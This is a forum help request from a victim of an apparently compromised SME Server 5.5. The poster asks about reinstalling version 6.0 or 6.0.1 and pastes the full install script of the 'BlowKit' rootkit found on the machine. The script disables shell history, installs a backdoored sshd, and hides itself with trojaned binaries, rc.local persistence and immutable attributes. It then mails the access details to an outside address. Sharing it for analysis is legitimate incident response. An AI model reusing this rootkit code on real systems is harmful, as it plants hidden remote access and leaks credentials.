I was hacked by my own stupid fault... was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up finding a second temporary backup server etc...
How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some Promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a windows user, not a real admin)... I then was having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ
The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...
I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.
contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs). Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!
DOH! I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?
What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do... Are the latest 6.0 updates all I'll need?
By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
#!/bin/bash
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU} ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi
if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."
=====================
I don't really understand what that code above does... but maybe someone here can shed some light on it all
Thanks for any advice you could give me.